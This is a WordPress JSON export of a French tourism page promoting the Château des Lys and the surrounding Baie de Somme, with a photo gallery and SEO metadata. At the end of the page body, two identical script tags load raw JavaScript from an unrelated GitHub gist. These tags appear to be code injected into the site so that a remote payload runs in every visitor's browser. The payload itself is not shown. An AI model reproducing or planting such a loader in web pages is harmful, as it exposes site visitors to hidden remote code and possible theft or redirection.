{"id":30,"date":"2013-01-21T18:23:51","date_gmt":"2013-01-21T18:23:51","guid":{"rendered":"http:\/\/www.chateaudeslys.net\/?page_id=30"},"modified":"2019-02-10T16:33:24","modified_gmt":"2019-02-10T16:33:24","slug":"area","status":"publish","type":"page","link":"https:\/\/www.chateaudeslys.com\/fr\/area\/","title":{"rendered":"Baie de Somme"},"content":{"rendered":"<p><\/p>\n<p style=\"text-align: center;\">Le Ch\u00e2teau des Lys est situ\u00e9 dans un \u00e9crin entre les bois et la mer, aux pourtours du petit village de Sailly-Flibeaucourt. C&rsquo;est un endroit charmant, souvent n\u00e9glig\u00e9 dans l&rsquo;urgence de rejoindre Paris ou le sud de la France. C&rsquo;est pourtant un lieu de vill\u00e9giature ancien. A dix minutes du ch\u00e2teau se situent, la for\u00eat de Cr\u00e9cy, la baie de Somme, le Chemin de Fer de la Baie de Somme, la superbe ville de Saint-Valery-sur-Somme et Le Crotoy si pittoresque. Abbeville est \u00e0 10 km et la ville cath\u00e9drale d&rsquo;Amiens \u00e0 moins de trente minutes. Plusieurs sites cl\u00e9s de la Premi\u00e8re Guerre Mondiale, les lieux de la bataille de Cr\u00e9cy et de la bataille d&rsquo;Azincourt, sont aussi tr\u00e8s proches. Le centre d&rsquo;accueil des visiteurs \u00e0 Azincourt est particuli\u00e8rement bien con\u00e7u. Cayeux, Fort Mahon et la belle ville d&rsquo;Ault (qui reste notre partie pr\u00e9f\u00e9r\u00e9e du trait de c\u00f4te avec ses superbes plages fossiles. D&rsquo;ailleurs n&rsquo;h\u00e9sitez pas \u00e0 nous demander un marteau pour aller \u00e0 la chasse aux fossiles!) Toutes ces villes sont \u00e0 vingt minutes en voiture. Il en est de m\u00eame de la merveilleuse cit\u00e9 fortifi\u00e9e de Montreuil-sur-Mer. Les villes de la \u201cRiviera du Nord\u201d, Le Touquet et Le Tr\u00e9port, sont \u00e0 moins de trente minutes de route. Si vous souhaitez vous rendre \u00e0 Paris, un train vous y am\u00e8nera en une heure trente depuis Abbeville, bien qu&rsquo;il y ait amples choses \u00e0 faire sur place. Les activit\u00e9s de proximit\u00e9 comprennent trois parcours de golf ; Les jardins et l&rsquo;abbaye de Valloires; plusieurs parcours accro-branches; des sorties nautiques et de p\u00eache vari\u00e9es, des activit\u00e9s \u00e9questres, du karting, et bien plus encore. Le parc d&rsquo;attraction de Bagatelle occupera les enfants et les rendra heureux toute une journ\u00e9e durant. La baie de Somme est un paradis pour les marcheurs et les cyclistes avec son parc ornithologique de renomm\u00e9e internationale juste \u00e0 c\u00f4t\u00e9. Il est possible d&rsquo;observer les phoques veaux-marin, de traverser les pr\u00e9s sal\u00e9s avec un guide, de r\u00e9colter des fossiles et marcher sur les sentiers de l&rsquo;ancienne for\u00eat de Cr\u00e9cy (et sur nos terres). Tout est \u00e0 proximit\u00e9, facilement accessible. Profitez des nombreux march\u00e9s aux puces ou brocantes organis\u00e9es localement, ainsi que toutes les activit\u00e9s culturelles, ou promenez-vous tout simplement dans les petits villages environnants tous tr\u00e8s sympathiques avec leurs clochers anciens et restaurants de qualit\u00e9. Vous pouvez aussi vous relaxer au ch\u00e2teau, sillonner les 6 hectares de bois au calme et voire la vie en rose.<\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.visit-somme.com\/somme_tourisme\/decouvrez\/cote_picarde\/la_baie_de_somme\">visit-somme.com<\/a>\u00a0\u00a0 <a href=\"http:\/\/www.grandsitebaiedesomme.fr\">grandsitebaiedesomme<\/a>\u00a0 \u00a0 <a href=\"http:\/\/www.saint-valery-sur-somme.fr\">saint-valery-sur-somme<\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.crotoy-baie-de-somme.com\">crotoy-baie-de-somme<\/a>\u00a0 \u00a0\u00a0<a href=\"http:\/\/www.cfbs.eu\/fr\">cfbs (steam train)<\/a>\u00a0 \u00a0\u00a0<a href=\"http:\/\/www.toerisme-frankrijk.nl\/regio\/Picardie\/Kinderen\/Kinderen\">Picardie with children<\/a>\u00a0 \u00a0\u00a0<a href=\"http:\/\/www.parcdumarquenterre.com\">parcdumarquenterre<\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.abbaye-valloires.com\">l&rsquo;Abbaye de Valloires<\/a><\/p>\n\n\t\t<style type=\"text\/css\">\n\t\t\t#gallery-3 {\n\t\t\t\tmargin: auto;\n\t\t\t}\n\t\t\t#gallery-3 .gallery-item {\n\t\t\t\tfloat: left;\n\t\t\t\tmargin-top: 10px;\n\t\t\t\ttext-align: center;\n\t\t\t\twidth: 16%;\n\t\t\t}\n\t\t\t#gallery-3 img {\n\t\t\t\tborder: 2px solid #cfcfcf;\n\t\t\t}\n\t\t\t#gallery-3 .gallery-caption {\n\t\t\t\tmargin-left: 0;\n\t\t\t}\n\t\t\t\/* see gallery_shortcode() in wp-includes\/media.php *\/\n\t\t<\/style>\n\t\t<div id='gallery-3' class='gallery galleryid-30 gallery-columns-6 gallery-size-thumbnail'><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/saint-valery-sur-somme-32568-11_w600.jpg' title=\"\" data-rl_title=\"\" class=\"rl-gallery-link\" data-rl_caption=\"\" data-rel=\"lightbox-gallery-3\" data-magnific_type=\"gallery\"><img width=\"150\" height=\"150\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/saint-valery-sur-somme-32568-11_w600-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/saint-valery-sur-somme-32568-11_w600-150x150.jpg 150w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/saint-valery-sur-somme-32568-11_w600-110x110.jpg 110w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/saint-valery-sur-somme-32568-11_w600-48x48.jpg 48w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/saint-valery-sur-somme-32568-11_w600-300x300.jpg 300w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/Saint-Valery-sur-Somme-15-Aout-6-.jpg' title=\"\" data-rl_title=\"\" class=\"rl-gallery-link\" data-rl_caption=\"\" data-rel=\"lightbox-gallery-3\" data-magnific_type=\"gallery\"><img width=\"150\" height=\"150\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/Saint-Valery-sur-Somme-15-Aout-6--150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/Saint-Valery-sur-Somme-15-Aout-6--150x150.jpg 150w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/Saint-Valery-sur-Somme-15-Aout-6--110x110.jpg 110w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/Saint-Valery-sur-Somme-15-Aout-6--48x48.jpg 48w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/Saint-Valery-sur-Somme-15-Aout-6--300x300.jpg 300w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/imgresize.asp-copie-11-1.jpeg' title=\"\" data-rl_title=\"\" class=\"rl-gallery-link\" data-rl_caption=\"\" data-rel=\"lightbox-gallery-3\" data-magnific_type=\"gallery\"><img width=\"150\" height=\"150\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/imgresize.asp-copie-11-1-150x150.jpeg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/imgresize.asp-copie-11-1-150x150.jpeg 150w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/imgresize.asp-copie-11-1-110x110.jpeg 110w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/imgresize.asp-copie-11-1-48x48.jpeg 48w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/imgresize.asp-copie-11-1-300x300.jpeg 300w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/4a1e590240dd06448a7bd46f2ef81083.jpg' title=\"\" data-rl_title=\"\" class=\"rl-gallery-link\" data-rl_caption=\"\" data-rel=\"lightbox-gallery-3\" data-magnific_type=\"gallery\"><img width=\"150\" height=\"150\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/4a1e590240dd06448a7bd46f2ef81083-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/4a1e590240dd06448a7bd46f2ef81083-150x150.jpg 150w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/4a1e590240dd06448a7bd46f2ef81083-110x110.jpg 110w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/4a1e590240dd06448a7bd46f2ef81083-48x48.jpg 48w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2016\/03\/63-IMAG0949.jpg' title=\"\" data-rl_title=\"\" class=\"rl-gallery-link\" data-rl_caption=\"\" data-rel=\"lightbox-gallery-3\" data-magnific_type=\"gallery\"><img width=\"150\" height=\"150\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2016\/03\/63-IMAG0949-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2016\/03\/63-IMAG0949-150x150.jpg 150w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2016\/03\/63-IMAG0949-110x110.jpg 110w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2015\/09\/17-15-IMG_47271.jpg' title=\"\" data-rl_title=\"\" class=\"rl-gallery-link\" data-rl_caption=\"\" data-rel=\"lightbox-gallery-3\" data-magnific_type=\"gallery\"><img width=\"150\" height=\"150\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2015\/09\/17-15-IMG_47271-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2015\/09\/17-15-IMG_47271-150x150.jpg 150w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2015\/09\/17-15-IMG_47271-110x110.jpg 110w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/><\/a>\n\t\t\t<\/dt><\/dl><br style=\"clear: both\" \/><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2015\/09\/20-6-IMG_39231.jpg' title=\"\" data-rl_title=\"\" class=\"rl-gallery-link\" data-rl_caption=\"\" data-rel=\"lightbox-gallery-3\" data-magnific_type=\"gallery\"><img width=\"150\" height=\"150\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2015\/09\/20-6-IMG_39231-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2015\/09\/20-6-IMG_39231-150x150.jpg 150w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2015\/09\/20-6-IMG_39231-110x110.jpg 110w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2013\/01\/21-img_0596.jpg' title=\"\" data-rl_title=\"\" class=\"rl-gallery-link\" data-rl_caption=\"\" data-rel=\"lightbox-gallery-3\" data-magnific_type=\"gallery\"><img width=\"415\" height=\"276\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2013\/01\/21-img_0596.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2013\/01\/08-712.jpg' title=\"\" data-rl_title=\"\" class=\"rl-gallery-link\" data-rl_caption=\"\" data-rel=\"lightbox-gallery-3\" data-magnific_type=\"gallery\"><img width=\"341\" height=\"350\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2013\/01\/08-712.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2013\/01\/09-756.jpg' title=\"\" data-rl_title=\"\" class=\"rl-gallery-link\" data-rl_caption=\"\" data-rel=\"lightbox-gallery-3\" data-magnific_type=\"gallery\"><img width=\"350\" height=\"350\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2013\/01\/09-756.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/l-occident-le-crotoy-maison-baiedesomme-plage2.jpg' title=\"\" data-rl_title=\"\" class=\"rl-gallery-link\" data-rl_caption=\"\" data-rel=\"lightbox-gallery-3\" data-magnific_type=\"gallery\"><img width=\"150\" height=\"150\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/l-occident-le-crotoy-maison-baiedesomme-plage2-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/l-occident-le-crotoy-maison-baiedesomme-plage2-150x150.jpg 150w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/l-occident-le-crotoy-maison-baiedesomme-plage2-110x110.jpg 110w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/l-occident-le-crotoy-maison-baiedesomme-plage2-48x48.jpg 48w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/saint-valery-somme-11510_w500.jpg' title=\"\" data-rl_title=\"\" class=\"rl-gallery-link\" data-rl_caption=\"\" data-rel=\"lightbox-gallery-3\" data-magnific_type=\"gallery\"><img width=\"150\" height=\"150\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/saint-valery-somme-11510_w500-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/saint-valery-somme-11510_w500-150x150.jpg 150w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/saint-valery-somme-11510_w500-110x110.jpg 110w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/saint-valery-somme-11510_w500-48x48.jpg 48w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/saint-valery-somme-11510_w500-300x300.jpg 300w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/><\/a>\n\t\t\t<\/dt><\/dl><br style=\"clear: both\" \/><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/ville-crotoy.jpg' title=\"\" data-rl_title=\"\" class=\"rl-gallery-link\" data-rl_caption=\"\" data-rel=\"lightbox-gallery-3\" data-magnific_type=\"gallery\"><img width=\"150\" height=\"150\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/ville-crotoy-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/ville-crotoy-150x150.jpg 150w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/ville-crotoy-110x110.jpg 110w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/ville-crotoy-48x48.jpg 48w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/ville-crotoy-300x300.jpg 300w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/IMAG0676.jpg' title=\"\" data-rl_title=\"\" class=\"rl-gallery-link\" data-rl_caption=\"\" data-rel=\"lightbox-gallery-3\" data-magnific_type=\"gallery\"><img width=\"150\" height=\"150\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/IMAG0676-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/IMAG0676-150x150.jpg 150w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/IMAG0676-110x110.jpg 110w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/IMAG0676-48x48.jpg 48w, https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2017\/01\/IMAG0676-300x300.jpg 300w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2013\/01\/20-img_0377.jpg' title=\"\" data-rl_title=\"\" class=\"rl-gallery-link\" data-rl_caption=\"\" data-rel=\"lightbox-gallery-3\" data-magnific_type=\"gallery\"><img width=\"415\" height=\"276\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2013\/01\/20-img_0377.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2013\/01\/11-791.jpg' title=\"\" data-rl_title=\"\" class=\"rl-gallery-link\" data-rl_caption=\"\" data-rel=\"lightbox-gallery-3\" data-magnific_type=\"gallery\"><img width=\"350\" height=\"350\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2013\/01\/11-791.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2013\/01\/22-img_0658.jpg' title=\"\" data-rl_title=\"\" class=\"rl-gallery-link\" data-rl_caption=\"\" data-rel=\"lightbox-gallery-3\" data-magnific_type=\"gallery\"><img width=\"233\" height=\"350\" src=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/2013\/01\/22-img_0658.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\" \/><\/a>\n\t\t\t<\/dt><\/dl>\n\t\t\t<br style='clear: both' \/>\n\t\t<\/div>\n\n<p><script src=\"https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js\" type=\"text\/javascript\"><\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Le Ch\u00e2teau des Lys est situ\u00e9 dans un \u00e9crin entre les bois et la mer, aux pourtours du petit village de Sailly-Flibeaucourt. C&rsquo;est un endroit charmant, souvent n\u00e9glig\u00e9 dans l&rsquo;urgence de rejoindre Paris ou le sud de la France. C&rsquo;est pourtant un lieu de vill\u00e9giature ancien. A dix minutes du ch\u00e2teau se situent, la for\u00eat de Cr\u00e9cy, la baie de &hellip;<span class=\"more-link\"><a href=\"https:\/\/www.chateaudeslys.com\/fr\/area\/\"><span class=\"button\">Continue reading &rarr;<\/span><\/a><\/span><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":7,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v18.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Baie de Somme - Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys Picardie<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.chateaudeslys.com\/nl\/area\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Baie de Somme - Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys Picardie\" \/>\n<meta property=\"og:description\" content=\"Le Ch\u00e2teau des Lys est situ\u00e9 dans un \u00e9crin entre les bois et la mer, aux pourtours du petit village de Sailly-Flibeaucourt. C&rsquo;est un endroit charmant, souvent n\u00e9glig\u00e9 dans l&rsquo;urgence de rejoindre Paris ou le sud de la France. C&rsquo;est pourtant un lieu de vill\u00e9giature ancien. A dix minutes du ch\u00e2teau se situent, la for\u00eat de Cr\u00e9cy, la baie de &hellip;Continue reading &rarr;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.chateaudeslys.com\/nl\/area\/\" \/>\n<meta property=\"og:site_name\" content=\"Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys Picardie\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/chateaudeslysfr\/\" \/>\n<meta property=\"article:modified_time\" content=\"2019-02-10T16:33:24+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/IMAG0669-150x150.jpg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@ChateaudeslysEn\" \/>\n<meta name=\"twitter:label1\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data1\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.chateaudeslys.com\/fr\/#website\",\"url\":\"https:\/\/www.chateaudeslys.com\/fr\/\",\"name\":\"Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys Picardie\",\"description\":\"Un lieu id\u00e9al pour s&#039;\u00e9vader, se d\u00e9tendre et se d\u00e9tendre. Il constitue un pied-\u00e0-terre id\u00e9al pour explorer la magnifique vall\u00e9e de la Somme pendant les vacances.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.chateaudeslys.com\/fr\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.chateaudeslys.com\/nl\/area\/#webpage\",\"url\":\"https:\/\/www.chateaudeslys.com\/nl\/area\/\",\"name\":\"Baie de Somme - Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys Picardie\",\"isPartOf\":{\"@id\":\"https:\/\/www.chateaudeslys.com\/fr\/#website\"},\"datePublished\":\"2013-01-21T18:23:51+00:00\",\"dateModified\":\"2019-02-10T16:33:24+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.chateaudeslys.com\/nl\/area\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.chateaudeslys.com\/nl\/area\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.chateaudeslys.com\/nl\/area\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.chateaudeslys.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Omgeving\"}]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Baie de Somme - Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys Picardie","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.chateaudeslys.com\/nl\/area\/","og_locale":"fr_FR","og_type":"article","og_title":"Baie de Somme - Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys Picardie","og_description":"Le Ch\u00e2teau des Lys est situ\u00e9 dans un \u00e9crin entre les bois et la mer, aux pourtours du petit village de Sailly-Flibeaucourt. C&rsquo;est un endroit charmant, souvent n\u00e9glig\u00e9 dans l&rsquo;urgence de rejoindre Paris ou le sud de la France. C&rsquo;est pourtant un lieu de vill\u00e9giature ancien. A dix minutes du ch\u00e2teau se situent, la for\u00eat de Cr\u00e9cy, la baie de &hellip;Continue reading &rarr;","og_url":"https:\/\/www.chateaudeslys.com\/nl\/area\/","og_site_name":"Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys Picardie","article_publisher":"https:\/\/www.facebook.com\/chateaudeslysfr\/","article_modified_time":"2019-02-10T16:33:24+00:00","og_image":[{"url":"https:\/\/www.chateaudeslys.com\/wp-content\/uploads\/IMAG0669-150x150.jpg"}],"twitter_card":"summary_large_image","twitter_site":"@ChateaudeslysEn","twitter_misc":{"Dur\u00e9e de lecture estim\u00e9e":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/www.chateaudeslys.com\/fr\/#website","url":"https:\/\/www.chateaudeslys.com\/fr\/","name":"Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys Picardie","description":"Un lieu id\u00e9al pour s&#039;\u00e9vader, se d\u00e9tendre et se d\u00e9tendre. Il constitue un pied-\u00e0-terre id\u00e9al pour explorer la magnifique vall\u00e9e de la Somme pendant les vacances.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.chateaudeslys.com\/fr\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.chateaudeslys.com\/nl\/area\/#webpage","url":"https:\/\/www.chateaudeslys.com\/nl\/area\/","name":"Baie de Somme - Escape To Chateau DIY - Mariages, Ev\u00e8nements, Famille - Ch\u00e2teau des Lys 